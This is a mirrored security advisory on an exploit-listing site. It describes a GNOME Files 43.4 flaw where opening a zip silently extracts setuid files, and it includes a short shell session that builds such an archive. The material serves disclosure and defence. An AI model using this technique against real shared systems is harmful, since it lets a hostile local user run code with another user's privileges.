Advertisement






GNOME Files 43.4 Privilege Escalation

CVE Category Price Severity
CVE-2021-33625 CWE-269 $10,000 High
Author Risk Exploitation Type Date
Unknown High Local 2023-08-08
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080034

Below is a copy:

GNOME Files 43.4 Privilege Escalation
Affected: GNOME Files 43.4 (nautilus) on fedora 37

Description:

If an user A opens in GNOME files zip archive containing
`setuid` file F, then F will be silently extracted to
a subdirectory of CWD.

If F is accessible by hostile local user B and B executes F,
then F will be executed as from user A.

tar(1) and unzip(1) are not vulnerable to this attack.

Session for creating the ZIP.
After that just open f.zip in GNOME files.
<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive:  f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x  3.0 unx        3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug  5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.